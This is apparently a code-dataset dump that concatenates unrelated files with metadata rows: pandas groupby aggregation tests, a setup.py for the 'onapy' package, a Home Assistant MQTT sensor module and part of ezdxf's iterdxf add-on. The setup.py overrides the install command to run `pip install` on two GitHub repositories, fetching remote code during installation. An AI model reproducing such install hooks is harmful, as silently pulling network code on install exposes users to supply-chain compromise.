index=pd.MultiIndex.from_product([["A", "B"], ["a", "b"]]),
)
result = df.groupby(level=0).agg(
aa=("A", "max"), bb=("A", "min"), cc=("B", "mean")
)
expected = pd.DataFrame(
{"aa": [0, 1], "bb": [0, 1], "cc": [1.5, 3.5]}, index=["A", "B"]
)
tm.assert_frame_equal(result, expected)
def test_agg_relabel_other_raises(self):
df = pd.DataFrame({"A": [0, 0, 1], "B": [1, 2, 3]})
grouped = df.groupby("A")
match = "Must provide"
with pytest.raises(TypeError, match=match):
grouped.agg(foo=1)
with pytest.raises(TypeError, match=match):
grouped.agg()
with pytest.raises(TypeError, match=match):
grouped.agg(a=("B", "max"), b=(1, 2, 3))
def test_missing_raises(self):
df = pd.DataFrame({"A": [0, 1], "B": [1, 2]})
with pytest.raises(KeyError, match="Column 'C' does not exist"):
df.groupby("A").agg(c=("C", "sum"))
def test_agg_namedtuple(self):
df = pd.DataFrame({"A": [0, 1], "B": [1, 2]})
result = df.groupby("A").agg(
b=pd.NamedAgg("B", "sum"), c=pd.NamedAgg(column="B", aggfunc="count")
)
expected = df.groupby("A").agg(b=("B", "sum"), c=("B", "count"))
tm.assert_frame_equal(result, expected)
def test_mangled(self):
df = pd.DataFrame({"A": [0, 1], "B": [1, 2], "C": [3, 4]})
result = df.groupby("A").agg(b=("B", lambda x: 0), c=("C", lambda x: 1))
expected = pd.DataFrame(
{"b": [0, 0], "c": [1, 1]}, index=pd.Index([0, 1], name="A")
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"agg_col1, agg_col2, agg_col3, agg_result1, agg_result2, agg_result3",
[
(
(("y", "A"), "max"),
(("y", "A"), np.min),
(("y", "B"), "mean"),
[1, 3],
[0, 2],
[5.5, 7.5],
),
(
(("y", "A"), lambda x: max(x)),
(("y", "A"), lambda x: 1),
(("y", "B"), "mean"),
[1, 3],
[1, 1],
[5.5, 7.5],
),
(
pd.NamedAgg(("y", "A"), "max"),
pd.NamedAgg(("y", "B"), np.mean),
pd.NamedAgg(("y", "A"), lambda x: 1),
[1, 3],
[5.5, 7.5],
[1, 1],
),
],
)
def test_agg_relabel_multiindex_column(
agg_col1, agg_col2, agg_col3, agg_result1, agg_result2, agg_result3
):
# GH 29422, add tests for multiindex column cases
df = DataFrame(
{"group": ["a", "a", "b", "b"], "A": [0, 1, 2, 3], "B": [5, 6, 7, 8]}
)
df.columns = pd.MultiIndex.from_tuples([("x", "group"), ("y", "A"), ("y", "B")])
idx = pd.Index(["a", "b"], name=("x", "group"))
result = df.groupby(("x", "group")).agg(a_max=(("y", "A"), "max"))
expected = DataFrame({"a_max": [1, 3]}, index=idx)
tm.assert_frame_equal(result, expected)
result = df.groupby(("x", "group")).agg(
col_1=agg_col1, col_2=agg_col2, col_3=agg_col3
)
expected = DataFrame(
{"col_1": agg_result1, "col_2": agg_result2, "col_3": agg_result3}, index=idx
)
tm.assert_frame_equal(result, expected)
def test_agg_relabel_multiindex_raises_not_exist():
# GH 29422, add test for raises senario when aggregate column does not exist
df = DataFrame(
{"group": ["a", "a", "b", "b"], "A": [0, 1, 2, 3], "B": [5, 6, 7, 8]}
)
df.columns = pd.MultiIndex.from_tuples([("x", "group"), ("y", "A"), ("y", "B")])
with pytest.raises(KeyError, match="does not exist"):
df.groupby(("x", "group")).agg(a=(("Y", "a"), "max"))
def test_agg_relabel_multiindex_duplicates():
# GH29422, add test for raises senario when getting duplicates
# GH28426, after this change, duplicates should also work if the relabelling is
# different
df = DataFrame(
{"group": ["a", "a", "b", "b"], "A": [0, 1, 2, 3], "B": [5, 6, 7, 8]}
)
df.columns = pd.MultiIndex.from_tuples([("x", "group"), ("y", "A"), ("y", "B")])
result = df.groupby(("x", "group")).agg(
a=(("y", "A"), "min"), b=(("y", "A"), "min")
)
idx = pd.Index(["a", "b"], name=("x", "group"))
expected = DataFrame({"a": [0, 2], "b": [0, 2]}, index=idx)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [{"c": ["min"]}, {"b": [], "c": ["min"]}])
def test_groupby_aggregate_empty_key(kwargs):
# GH: 32580
df = pd.DataFrame({"a": [1, 1, 2], "b": [1, 2, 3], "c": [1, 2, 4]})
result = df.groupby("a").agg(kwargs)
expected = pd.DataFrame(
[1, 4],
index=pd.Index([1, 2], dtype="int64", name="a"),
columns=pd.MultiIndex.from_tuples([["c", "min"]]),
)
tm.assert_frame_equal(result, expected)
def test_groupby_aggregate_empty_key_empty_return():
# GH: 32580 Check if everything works, when return is empty
df = pd.DataFrame({"a": [1, 1, 2], "b": [1, 2, 3], "c": [1, 2, 4]})
result = df.groupby("a").agg({"b": []})
expected = pd.DataFrame(columns=pd.MultiIndex(levels=[["b"], []], codes=[[], []]))
tm.assert_frame_equal(result, expected)
def test_grouby_agg_loses_results_with_as_index_false_relabel():
# GH 32240: When the aggregate function relabels column names and
# as_index=False is specified, the results are dropped.
df = pd.DataFrame(
{"key": ["x", "y", "z", "x", "y", "z"], "val": [1.0, 0.8, 2.0, 3.0, 3.6, 0.75]}
)
grouped = df.groupby("key", as_index=False)
result = grouped.agg(min_val=pd.NamedAgg(column="val", aggfunc="min"))
expected = pd.DataFrame({"key": ["x", "y", "z"], "min_val": [1.0, 0.8, 0.75]})
tm.assert_frame_equal(result, expected)
def test_grouby_agg_loses_results_with_as_index_false_relabel_multiindex():
# GH 32240: When the aggregate function relabels column names and
# as_index=False is specified, the results are dropped. Check if
# multiindex is returned in the right order
df = pd.DataFrame(
{
"key": ["x", "y", "x", "y", "x", "x"],
"key1": ["a", "b", "c", "b", "a", "c"],
"val": [1.0, 0.8, 2.0, 3.0, 3.6, 0.75],
}
)
grouped = df.groupby(["key", "key1"], as_index=False)
result = grouped.agg(min_val=pd.NamedAgg(column="val", aggfunc="min"))
expected = pd.DataFrame(
{"key": ["x", "x", "y"], "key1": ["a", "c", "b"], "min_val": [1.0, 0.75, 0.8]}
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"func", [lambda s: s.mean(), lambda s: np.mean(s), lambda s: np.nanmean(s)]
)
def test_multiindex_custom_func(func):
# GH 31777
data = [[1, 4, 2], [5, 7, 1]]
df = pd.DataFrame(data, columns=pd.MultiIndex.from_arrays([[1, 1, 2], [3, 4, 3]]))
result = df.groupby(np.array([0, 1])).agg(func)
expected_dict = {(1, 3): {0: 1, 1: 5}, (1, 4): {0: 4, 1: 7}, (2, 3): {0: 2, 1: 1}}
expected = pd.DataFrame(expected_dict)
tm.assert_frame_equal(result, expected)
def myfunc(s):
return np.percentile(s, q=0.90)
@pytest.mark.parametrize("func", [lambda s: np.percentile(s, q=0.90), myfunc])
def test_lambda_named_agg(func):
# see gh-28467
animals = DataFrame(
{
"kind": ["cat", "dog", "cat", "dog"],
"height": [9.1, 6.0, 9.5, 34.0],
"weight": [7.9, 7.5, 9.9, 198.0],
}
)
result = animals.groupby("kind").agg(
mean_height=("height", "mean"), perc90=("height", func)
)
expected = DataFrame(
[[9.3, 9.1036], [20.0, 6.252]],
columns=["mean_height", "perc90"],
index=Index(["cat", "dog"], name="kind"),
)
tm.assert_frame_equal(result, expected)
def test_aggregate_mixed_types():
# GH 16916
df = pd.DataFrame(
data=np.array([0] * 9).reshape(3, 3), columns=list("XYZ"), index=list("abc")
)
df["grouping"] = ["group 1", "group 1", 2]
result = df.groupby("grouping").aggregate(lambda x: x.tolist())
expected_data = [[[0], [0], [0]], [[0, 0], [0, 0], [0, 0]]]
expected = pd.DataFrame(
expected_data,
index=Index([2, "group 1"], dtype="object", name="grouping"),
columns=Index(["X", "Y", "Z"], dtype="object"),
)
tm.assert_frame_equal(result, expected)
@pytest.mark.xfail(reason="Not implemented;see GH 31256")
def test_aggregate_udf_na_extension_type():
# https://github.com/pandas-dev/pandas/pull/31359
# This is currently failing to cast back to Int64Dtype.
# The presence of the NA causes two problems
# 1. NA is not an instance of Int64Dtype.type (numpy.int64)
# 2. The presence of an NA forces object type, so the non-NA values is
# a Python int rather than a NumPy int64. Python ints aren't
# instances of numpy.int64.
def aggfunc(x):
if all(x > 2):
return 1
else:
return pd.NA
df = pd.DataFrame({"A": pd.array([1, 2, 3])})
result = df.groupby([1, 1, 2]).agg(aggfunc)
expected = pd.DataFrame({"A": pd.array([1, pd.NA], dtype="Int64")}, index=[1, 2])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("func", ["min", "max"])
def test_groupby_aggregate_period_column(func):
# GH 31471
groups = [1, 2]
periods = pd.period_range("2020", periods=2, freq="Y")
df = pd.DataFrame({"a": groups, "b": periods})
result = getattr(df.groupby("a")["b"], func)()
idx = pd.Int64Index([1, 2], name="a")
expected = pd.Series(periods, index=idx, name="b")
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("func", ["min", "max"])
def test_groupby_aggregate_period_frame(func):
# GH 31471
groups = [1, 2]
periods = pd.period_range("2020", periods=2, freq="Y")
df = pd.DataFrame({"a": groups, "b": periods})
result = getattr(df.groupby("a"), func)()
idx = pd.Int64Index([1, 2], name="a")
expected = pd.DataFrame({"b": periods}, index=idx)
tm.assert_frame_equal(result, expected)
class TestLambdaMangling:
def test_basic(self):
df = pd.DataFrame({"A": [0, 0, 1, 1], "B": [1, 2, 3, 4]})
result = df.groupby("A").agg({"B": [lambda x: 0, lambda x: 1]})
expected = pd.DataFrame(
{("B", "<lambda_0>"): [0, 0], ("B", "<lambda_1>"): [1, 1]},
index=pd.Index([0, 1], name="A"),
)
tm.assert_frame_equal(result, expected)
def test_mangle_series_groupby(self):
gr = pd.Series([1, 2, 3, 4]).groupby([0, 0, 1, 1])
result = gr.agg([lambda x: 0, lambda x: 1])
expected = pd.DataFrame({"<lambda_0>": [0, 0], "<lambda_1>": [1, 1]})
tm.assert_frame_equal(result, expected)
@pytest.mark.xfail(reason="GH-26611. kwargs for multi-agg.")
def test_with_kwargs(self):
f1 = lambda x, y, b=1: x.sum() + y + b
f2 = lambda x, y, b=2: x.sum() + y * b
result = pd.Series([1, 2]).groupby([0, 0]).agg([f1, f2], 0)
expected = pd.DataFrame({"<lambda_0>": [4], "<lambda_1>": [6]})
tm.assert_frame_equal(result, expected)
result = pd.Series([1, 2]).groupby([0, 0]).agg([f1, f2], 0, b=10)
expected = pd.DataFrame({"<lambda_0>": [13], "<lambda_1>": [30]})
tm.assert_frame_equal(result, expected)
def test_agg_with_one_lambda(self):
# GH 25719, write tests for DataFrameGroupby.agg with only one lambda
df = pd.DataFrame(
{
"kind": ["cat", "dog", "cat", "dog"],
"height": [9.1, 6.0, 9.5, 34.0],
"weight": [7.9, 7.5, 9.9, 198.0],
}
)
columns = ["height_sqr_min", "height_max", "weight_max"]
expected = pd.DataFrame(
{
"height_sqr_min": [82.81, 36.00],
"height_max": [9.5, 34.0],
"weight_max": [9.9, 198.0],
},
index=pd.Index(["cat", "dog"], name="kind"),
columns=columns,
)
# check pd.NameAgg case
result1 = df.groupby(by="kind").agg(
height_sqr_min=pd.NamedAgg(
column="height", aggfunc=lambda x: np.min(x ** 2)
),
height_max=pd.NamedAgg(column="height", aggfunc="max"),
weight_max=pd.NamedAgg(column="weight", aggfunc="max"),
)
tm.assert_frame_equal(result1, expected)
# check agg(key=(col, aggfunc)) case
result2 = df.groupby(by="kind").agg(
height_sqr_min=("height", lambda x: np.min(x ** 2)),
height_max=("height", "max"),
weight_max=("weight", "max"),
)
tm.assert_frame_equal(result2, expected)
def test_agg_multiple_lambda(self):
# GH25719, test for DataFrameGroupby.agg with multiple lambdas
# with mixed aggfunc
df = pd.DataFrame(
{
"kind": ["cat", "dog", "cat", "dog"],
"height": [9.1, 6.0, 9.5, 34.0],
"weight": [7.9, 7.5, 9.9, 198.0],
}
)
columns = [
"height_sqr_min",
"height_max",
"weight_max",
"height_max_2",
"weight_min",
]
expected = pd.DataFrame(
{
"height_sqr_min": [82.81, 36.00],
"height_max": [9.5, 34.0],
"weight_max": [9.9, 198.0],
"height_max_2": [9.5, 34.0],
"weight_min": [7.9, 7.5],
},
index=pd.Index(["cat", "dog"], name="kind"),
columns=columns,
)
# check agg(key=(col, aggfunc)) case
result1 = df.groupby(by="kind").agg(
height_sqr_min=("height", lambda x: np.min(x ** 2)),
height_max=("height", "max"),
weight_max=("weight", "max"),
height_max_2=("height", lambda x: np.max(x)),
weight_min=("weight", lambda x: np.min(x)),
)
tm.assert_frame_equal(result1, expected)
# check pd.NamedAgg case
result2 = df.groupby(by="kind").agg(
height_sqr_min=pd.NamedAgg(
column="height", aggfunc=lambda x: np.min(x ** 2)
),
height_max=pd.NamedAgg(column="height", aggfunc="max"),
weight_max=pd.NamedAgg(column="weight", aggfunc="max"),
height_max_2=pd.NamedAgg(column="height", aggfunc=lambda x: np.max(x)),
weight_min=pd.NamedAgg(column="weight", aggfunc=lambda x: np.min(x)),
)
tm.assert_frame_equal(result2, expected)
def test_groupby_get_by_index():
# GH 33439
df = pd.DataFrame({"A": ["S", "W", "W"], "B": [1.0, 1.0, 2.0]})
res = df.groupby("A").agg({"B": lambda x: x.get(x.index[-1])})
expected = pd.DataFrame(dict(A=["S", "W"], B=[1.0, 2.0])).set_index("A")
pd.testing.assert_frame_equal(res, expected)
@pytest.mark.parametrize(
"grp_col_dict, exp_data",
[
({"nr": "min", "cat_ord": "min"}, {"nr": [1, 5], "cat_ord": ["a", "c"]}),
({"cat_ord": "min"}, {"cat_ord": ["a", "c"]}),
({"nr": "min"}, {"nr": [1, 5]}),
],
)
def test_groupby_single_agg_cat_cols(grp_col_dict, exp_data):
# test single aggregations on ordered categorical cols GHGH27800
# create the result dataframe
input_df = pd.DataFrame(
{
"nr": [1, 2, 3, 4, 5, 6, 7, 8],
"cat_ord": list("aabbccdd"),
"cat": list("aaaabbbb"),
}
)
input_df = input_df.astype({"cat": "category", "cat_ord": "category"})
input_df["cat_ord"] = input_df["cat_ord"].cat.as_ordered()
result_df = input_df.groupby("cat").agg(grp_col_dict)
# create expected dataframe
cat_index = pd.CategoricalIndex(
["a", "b"], categories=["a", "b"], ordered=False, name="cat", dtype="category"
)
expected_df = pd.DataFrame(data=exp_data, index=cat_index)
tm.assert_frame_equal(result_df, expected_df)
@pytest.mark.parametrize(
"grp_col_dict, exp_data",
[
({"nr": ["min", "max"], "cat_ord": "min"}, [(1, 4, "a"), (5, 8, "c")]),
({"nr": "min", "cat_ord": ["min", "max"]}, [(1, "a", "b"), (5, "c", "d")]),
({"cat_ord": ["min", "max"]}, [("a", "b"), ("c", "d")]),
],
)
def test_groupby_combined_aggs_cat_cols(grp_col_dict, exp_data):
# test combined aggregations on ordered categorical cols GH27800
# create the result dataframe
input_df = pd.DataFrame(
{
"nr": [1, 2, 3, 4, 5, 6, 7, 8],
"cat_ord": list("aabbccdd"),
"cat": list("aaaabbbb"),
}
)
input_df = input_df.astype({"cat": "category", "cat_ord": "category"})
input_df["cat_ord"] = input_df["cat_ord"].cat.as_ordered()
result_df = input_df.groupby("cat").agg(grp_col_dict)
# create expected dataframe
cat_index = pd.CategoricalIndex(
["a", "b"], categories=["a", "b"], ordered=False, name="cat", dtype="category"
)
# unpack the grp_col_dict to create the multi-index tuple
# this tuple will be used to create the expected dataframe index
multi_index_list = []
for k, v in grp_col_dict.items():
if isinstance(v, list):
for value in v:
multi_index_list.append([k, value])
else:
multi_index_list.append([k, v])
multi_index = pd.MultiIndex.from_tuples(tuple(multi_index_list))
expected_df = pd.DataFrame(data=exp_data, columns=multi_index, index=cat_index)
tm.assert_frame_equal(result_df, expected_df)
def test_nonagg_agg():
# GH 35490 - Single/Multiple agg of non-agg function give same results
# TODO: agg should raise for functions that don't aggregate
df = pd.DataFrame({"a": [1, 1, 2, 2], "b": [1, 2, 2, 1]})
g = df.groupby("a")
result = g.agg(["cumsum"])
result.columns = result.columns.droplevel(-1)
expected = g.agg("cumsum")
tm.assert_frame_equal(result, expected)
def test_agg_no_suffix_index():
# GH36189
df = pd.DataFrame([[4, 9]] * 3, columns=["A", "B"])
result = df.agg(["sum", lambda x: x.sum(), lambda x: x.sum()])
expected = pd.DataFrame(
{"A": [12, 12, 12], "B": [27, 27, 27]}, index=["sum", "<lambda>", "<lambda>"]
)
tm.assert_frame_equal(result, expected)
# test Series case
result = df["A"].agg(["sum", lambda x: x.sum(), lambda x: x.sum()])
expected = pd.Series([12, 12, 12], index=["sum", "<lambda>", "<lambda>"], name="A")
tm.assert_series_equal(result, expected)
| 33.122972
| 87
| 0.547529
|
4a0ea66000c8da72f003d6d7059e3781c2201689
| 1,482
|
py
|
Python
|
setup.py
|
xiong-jie-y/onapy
|
50b588d014dc24cd4876c784c8e69fba4eaf547e
|
[
"MIT"
] | 6
|
2021-03-23T14:44:33.000Z
|
2021-03-24T05:37:20.000Z
|
setup.py
|
xiong-jie-y/onapy
|
50b588d014dc24cd4876c784c8e69fba4eaf547e
|
[
"MIT"
] | null | null | null |
setup.py
|
xiong-jie-y/onapy
|
50b588d014dc24cd4876c784c8e69fba4eaf547e
|
[
"MIT"
] | null | null | null |
import os
import setuptools
import glob
__version__ = '0.0.1dev2'
def _parse_requirements(path):
with open(path) as f:
return [
line.rstrip()
for line in f
if not (line.isspace() or line.startswith('#'))
]
from setuptools.command.install import install
from subprocess import getoutput
class PostInstall(install):
pkgs = ' git+https://github.com/xiong-jie-y/remimi.git'\
' git+https://github.com/xiong-jie-y/mmdetection.git'
def run(self):
install.run(self)
print(getoutput('pip install'+self.pkgs))
requirements = _parse_requirements('requirements.txt')
print(requirements)
setuptools.setup(
name='onapy',
version=__version__,
url='https://github.com/xiong-jie-y/onapy',
description='Onapy is the library to for next generation of masturbation.',
author='xiong jie',
author_email='fwvillage@gmail.com',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
packages=setuptools.find_packages(),
install_requires=requirements,
license='MIT License',
scripts=['scripts/recognize_onaho_motion', 'scripts/recognize_waist_motion'],
keywords='perception,masturbation',
package_data={
"": ["configs/*.*"]
},
dependency_links=[
'https://github.com/xiong-jie-y/remimi.git',
'https://github.com/xiong-jie-y/mmdetection.git'
],
cmdclass={'install': PostInstall}
)
| 29.058824
| 81
| 0.67004
|
4a0ea75de21da682e4c54c6dee33d31901145647
| 10,012
|
py
|
Python
|
homeassistant/components/mqtt/sensor.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/mqtt/sensor.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | 21
|
2021-11-23T06:27:34.000Z
|
2022-03-31T06:24:13.000Z
|
homeassistant/components/mqtt/sensor.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | null | null | null |
"""Support for MQTT sensors."""
from __future__ import annotations
from datetime import timedelta
import functools
import logging
import voluptuous as vol
from homeassistant.components import sensor
from homeassistant.components.sensor import (
DEVICE_CLASSES_SCHEMA,
STATE_CLASSES_SCHEMA,
SensorEntity,
)
from homeassistant.const import (
CONF_DEVICE_CLASS,
CONF_FORCE_UPDATE,
CONF_NAME,
CONF_UNIT_OF_MEASUREMENT,
CONF_VALUE_TEMPLATE,
)
from homeassistant.core import HomeAssistant, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.event import async_track_point_in_utc_time
from homeassistant.helpers.reload import async_setup_reload_service
from homeassistant.helpers.typing import ConfigType
from homeassistant.util import dt as dt_util
from . import CONF_QOS, CONF_STATE_TOPIC, DOMAIN, PLATFORMS, subscription
from .. import mqtt
from .debug_info import log_messages
from .mixins import (
MQTT_ENTITY_COMMON_SCHEMA,
MqttAvailability,
MqttEntity,
async_setup_entry_helper,
)
_LOGGER = logging.getLogger(__name__)
CONF_EXPIRE_AFTER = "expire_after"
CONF_LAST_RESET_TOPIC = "last_reset_topic"
CONF_LAST_RESET_VALUE_TEMPLATE = "last_reset_value_template"
CONF_STATE_CLASS = "state_class"
MQTT_SENSOR_ATTRIBUTES_BLOCKED = frozenset(
{
sensor.ATTR_LAST_RESET,
sensor.ATTR_STATE_CLASS,
}
)
DEFAULT_NAME = "MQTT Sensor"
DEFAULT_FORCE_UPDATE = False
def validate_options(conf):
"""Validate options.
If last reset topic is present it must be same as the state topic.
"""
if (
CONF_LAST_RESET_TOPIC in conf
and CONF_STATE_TOPIC in conf
and conf[CONF_LAST_RESET_TOPIC] != conf[CONF_STATE_TOPIC]
):
_LOGGER.warning(
"'%s' must be same as '%s'", CONF_LAST_RESET_TOPIC, CONF_STATE_TOPIC
)
if CONF_LAST_RESET_TOPIC in conf and CONF_LAST_RESET_VALUE_TEMPLATE not in conf:
_LOGGER.warning(
"'%s' must be set if '%s' is set",
CONF_LAST_RESET_VALUE_TEMPLATE,
CONF_LAST_RESET_TOPIC,
)
return conf
PLATFORM_SCHEMA = vol.All(
cv.deprecated(CONF_LAST_RESET_TOPIC),
mqtt.MQTT_RO_PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_DEVICE_CLASS): DEVICE_CLASSES_SCHEMA,
vol.Optional(CONF_EXPIRE_AFTER): cv.positive_int,
vol.Optional(CONF_FORCE_UPDATE, default=DEFAULT_FORCE_UPDATE): cv.boolean,
vol.Optional(CONF_LAST_RESET_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_LAST_RESET_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_STATE_CLASS): STATE_CLASSES_SCHEMA,
vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string,
}
).extend(MQTT_ENTITY_COMMON_SCHEMA.schema),
validate_options,
)
async def async_setup_platform(
hass: HomeAssistant, config: ConfigType, async_add_entities, discovery_info=None
):
"""Set up MQTT sensors through configuration.yaml."""
await async_setup_reload_service(hass, DOMAIN, PLATFORMS)
await _async_setup_entity(hass, async_add_entities, config)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up MQTT sensors dynamically through MQTT discovery."""
setup = functools.partial(
_async_setup_entity, hass, async_add_entities, config_entry=config_entry
)
await async_setup_entry_helper(hass, sensor.DOMAIN, setup, PLATFORM_SCHEMA)
async def _async_setup_entity(
hass, async_add_entities, config: ConfigType, config_entry=None, discovery_data=None
):
"""Set up MQTT sensor."""
async_add_entities([MqttSensor(hass, config, config_entry, discovery_data)])
class MqttSensor(MqttEntity, SensorEntity):
"""Representation of a sensor that can be updated using MQTT."""
_attr_last_reset = None
_attributes_extra_blocked = MQTT_SENSOR_ATTRIBUTES_BLOCKED
def __init__(self, hass, config, config_entry, discovery_data):
"""Initialize the sensor."""
self._state = None
self._expiration_trigger = None
expire_after = config.get(CONF_EXPIRE_AFTER)
if expire_after is not None and expire_after > 0:
self._expired = True
else:
self._expired = None
MqttEntity.__init__(self, hass, config, config_entry, discovery_data)
@staticmethod
def config_schema():
"""Return the config schema."""
return PLATFORM_SCHEMA
def _setup_from_config(self, config):
"""(Re)Setup the entity."""
template = self._config.get(CONF_VALUE_TEMPLATE)
if template is not None:
template.hass = self.hass
last_reset_template = self._config.get(CONF_LAST_RESET_VALUE_TEMPLATE)
if last_reset_template is not None:
last_reset_template.hass = self.hass
async def _subscribe_topics(self):
"""(Re)Subscribe to topics."""
topics = {}
def _update_state(msg):
payload = msg.payload
# auto-expire enabled?
expire_after = self._config.get(CONF_EXPIRE_AFTER)
if expire_after is not None and expire_after > 0:
# When expire_after is set, and we receive a message, assume device is not expired since it has to be to receive the message
self._expired = False
# Reset old trigger
if self._expiration_trigger:
self._expiration_trigger()
self._expiration_trigger = None
# Set new trigger
expiration_at = dt_util.utcnow() + timedelta(seconds=expire_after)
self._expiration_trigger = async_track_point_in_utc_time(
self.hass, self._value_is_expired, expiration_at
)
template = self._config.get(CONF_VALUE_TEMPLATE)
if template is not None:
variables = {"entity_id": self.entity_id}
payload = template.async_render_with_possible_json_value(
payload,
self._state,
variables=variables,
)
self._state = payload
def _update_last_reset(msg):
payload = msg.payload
template = self._config.get(CONF_LAST_RESET_VALUE_TEMPLATE)
if template is not None:
variables = {"entity_id": self.entity_id}
payload = template.async_render_with_possible_json_value(
payload,
self._state,
variables=variables,
)
if not payload:
_LOGGER.debug("Ignoring empty last_reset message from '%s'", msg.topic)
return
try:
last_reset = dt_util.parse_datetime(payload)
if last_reset is None:
raise ValueError
self._attr_last_reset = last_reset
except ValueError:
_LOGGER.warning(
"Invalid last_reset message '%s' from '%s'", msg.payload, msg.topic
)
@callback
@log_messages(self.hass, self.entity_id)
def message_received(msg):
"""Handle new MQTT messages."""
_update_state(msg)
if CONF_LAST_RESET_VALUE_TEMPLATE in self._config and (
CONF_LAST_RESET_TOPIC not in self._config
or self._config[CONF_LAST_RESET_TOPIC] == self._config[CONF_STATE_TOPIC]
):
_update_last_reset(msg)
self.async_write_ha_state()
topics["state_topic"] = {
"topic": self._config[CONF_STATE_TOPIC],
"msg_callback": message_received,
"qos": self._config[CONF_QOS],
}
@callback
@log_messages(self.hass, self.entity_id)
def last_reset_message_received(msg):
"""Handle new last_reset messages."""
_update_last_reset(msg)
self.async_write_ha_state()
if (
CONF_LAST_RESET_TOPIC in self._config
and self._config[CONF_LAST_RESET_TOPIC] != self._config[CONF_STATE_TOPIC]
):
topics["last_reset_topic"] = {
"topic": self._config[CONF_LAST_RESET_TOPIC],
"msg_callback": last_reset_message_received,
"qos": self._config[CONF_QOS],
}
self._sub_state = await subscription.async_subscribe_topics(
self.hass, self._sub_state, topics
)
@callback
def _value_is_expired(self, *_):
"""Triggered when value is expired."""
self._expiration_trigger = None
self._expired = True
self.async_write_ha_state()
@property
def native_unit_of_measurement(self):
"""Return the unit this state is expressed in."""
return self._config.get(CONF_UNIT_OF_MEASUREMENT)
@property
def force_update(self):
"""Force update."""
return self._config[CONF_FORCE_UPDATE]
@property
def native_value(self):
"""Return the state of the entity."""
return self._state
@property
def device_class(self) -> str | None:
"""Return the device class of the sensor."""
return self._config.get(CONF_DEVICE_CLASS)
@property
def state_class(self) -> str | None:
"""Return the state class of the sensor."""
return self._config.get(CONF_STATE_CLASS)
@property
def available(self) -> bool:
"""Return true if the device is available and value has not expired."""
expire_after = self._config.get(CONF_EXPIRE_AFTER)
# mypy doesn't know about fget: https://github.com/python/mypy/issues/6185
return MqttAvailability.available.fget(self) and ( # type: ignore[attr-defined]
expire_after is None or not self._expired
)
| 34.170648
| 140
| 0.651119
|
4a0ea88087ba775d9f75b6776c9d204eb07f5298
| 16,816
|
py
|
Python
|
src/ezdxf/addons/iterdxf.py
|
jkjt/ezdxf
|
2acc5611b81476ea16b98063b9f55446a9182b81
|
[
"MIT"
] | 515
|
2017-01-25T05:46:52.000Z
|
2022-03-29T09:52:27.000Z
|
src/ezdxf/addons/iterdxf.py
|
jkjt/ezdxf
|
2acc5611b81476ea16b98063b9f55446a9182b81
|
[
"MIT"
] | 417
|
2017-01-25T10:01:17.000Z
|
2022-03-29T09:22:04.000Z
|
src/ezdxf/addons/iterdxf.py
|
jkjt/ezdxf
|
2acc5611b81476ea16b98063b9f55446a9182b81
|
[
"MIT"
] | 149
|
2017-02-01T15:52:02.000Z
|
2022-03-17T10:33:38.000Z
|
# Copyright (c) 2020-2021, Manfred Moitzi
# License: MIT License
from typing import (
Iterable,
Iterator,
cast,
BinaryIO,
Tuple,
Dict,
Optional,
List,
Set,
Union,
Any,
)
from io import StringIO
from pathlib import Path
from ezdxf.lldxf.const import DXFStructureError
from ezdxf.lldxf.extendedtags import ExtendedTags, DXFTag
from ezdxf.lldxf.tagwriter import TagWriter
from ezdxf.lldxf.tagger import tag_compiler, ascii_tags_loader
from ezdxf.filemanagement import dxf_file_info
from ezdxf.lldxf import fileindex
from ezdxf.entities import DXFGraphic, DXFEntity, Polyline, Insert
from ezdxf.entities import factory
from ezdxf.entities.subentity import entity_linker
from ezdxf.tools.codepage import toencoding
__all__ = ["opendxf", "single_pass_modelspace", "modelspace"]
SUPPORTED_TYPES = {
"ARC",
"LINE",
"CIRCLE",
"ELLIPSE",
"POINT",
"LWPOLYLINE",
"SPLINE",
"3DFACE",
"SOLID",
"TRACE",
"SHAPE",
"POLYLINE",
"VERTEX",
"SEQEND",
"MESH",
"TEXT",
"MTEXT",
"HATCH",
"INSERT",
"ATTRIB",
"ATTDEF",
"RAY",
"XLINE",
"DIMENSION",
"LEADER",
"IMAGE",
"WIPEOUT",
"HELIX",
"MLINE",
"MLEADER",
}
Filename = Union[Path, str]
class IterDXF:
"""Iterator for DXF entities stored in the modelspace.
Args:
name: filename, has to be a seekable file.
errors: specify decoding error handler
- "surrogateescape" to preserve possible binary data (default)
- "ignore" to use the replacement char U+FFFD "\ufffd" for invalid data
- "strict" to raise an :class:`UnicodeDecodeError`exception for invalid data
Raises:
DXFStructureError: invalid or incomplete DXF file
UnicodeDecodeError: if `errors` is "strict" and a decoding error occurs
"""
def __init__(self, name: Filename, errors: str = "surrogateescape"):
self.structure, self.sections = self._load_index(str(name))
self.errors = errors
self.file: BinaryIO = open(name, mode="rb")
if "ENTITIES" not in self.sections:
raise DXFStructureError("ENTITIES section not found.")
if self.structure.version > "AC1009" and "OBJECTS" not in self.sections:
raise DXFStructureError("OBJECTS section not found.")
def _load_index(
self, name: str
) -> Tuple[fileindex.FileStructure, Dict[str, int]]:
structure = fileindex.load(name)
sections: Dict[str, int] = dict()
new_index = []
for e in structure.index:
if e.code == 0:
new_index.append(e)
elif e.code == 2:
sections[e.value] = len(new_index) - 1
# remove all other tags like handles (code == 5)
structure.index = new_index
return structure, sections
@property
def encoding(self):
return self.structure.encoding
@property
def dxfversion(self):
return self.structure.version
def export(self, name: Filename) -> "IterDXFWriter":
"""Returns a companion object to export parts from the source DXF file
into another DXF file, the new file will have the same HEADER, CLASSES,
